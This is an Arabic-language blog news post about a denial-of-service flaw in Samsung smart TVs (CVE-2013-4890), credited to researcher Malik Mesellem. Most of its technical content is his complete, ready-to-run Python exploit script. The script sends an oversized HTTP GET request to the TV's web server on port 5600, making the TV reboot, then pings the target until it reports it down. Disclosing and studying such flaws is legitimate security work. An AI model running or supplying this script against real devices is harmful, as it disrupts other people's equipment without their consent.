تغرة في أجهزة Samusung SMART/TV تمكنك من عمل هجوم حجب الخدمة

هاكينغ نيوز : محمد لحلو

أكد الباحث في مجال الامن المعلوماتي مالك مسيلم على إيجاده لتغرة في أجهزة التلفاز سامنونج تمكنه من عمل هجوم حجب الخدمة،حيث يشكل هذا التهديد خطر كبير على هذه الأجهزة التلفزية ، حيث تتوفر هذه الاجهزة على قدرة الاتصال بالانترنيت عن طريق الواي فاي و بالتالي تمكنك من عمل هجوم حجب الخدمة عن طريق ارسال عدة بروتوكولات بشكل متتابع حيث يقوم الجهاز بحجب الصورة و الصوت متأترا بالهجمة

مع العلم أن هذا الهجوم يتم عن طريق سكريبت معين مكتوب بلغة البايثون حيث يتم تشغيله من جهاز متصل على نفس الشبكة التي عليها جهاز التلفاز

و أكد الباحث الامني ان الجهاز التلفزي متبث عليه ويب سرڤرحيث مباشرة بعد إرسال طلبات حجب
الخدمة من المهاجم يقوم السرڤر بالرد على هاته الطلبات عبر پورت5600 حيث يمكنه من حجب  الصورة و الصوت للجهاز

:السكريبت المستعمل في الهجمة

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   As a results, the TV reboots...
#   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) 

import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description:\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :) \n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:

    print "  Target down!\n"
هذا ڤيديو تجريبي لعمل الهجوم:



:هذا مثال على استعمال السكريبت عبر الترمينال 


ليست هناك تعليقات:

إرسال تعليق

تابعنا على الفيسبوك

إجمالي مرات مشاهدة الصفحة

بث المحترف

التسميات

التسميات

إلتحق بصفحتنا على الفيسبوك

يتم التشغيل بواسطة Blogger.

الموضوعات الأكثر زياره فى المدونه خلال 7 ايام الماضية

Privacy-Policy| إتفاقية الإستخدام تصميم : يزيد خراطي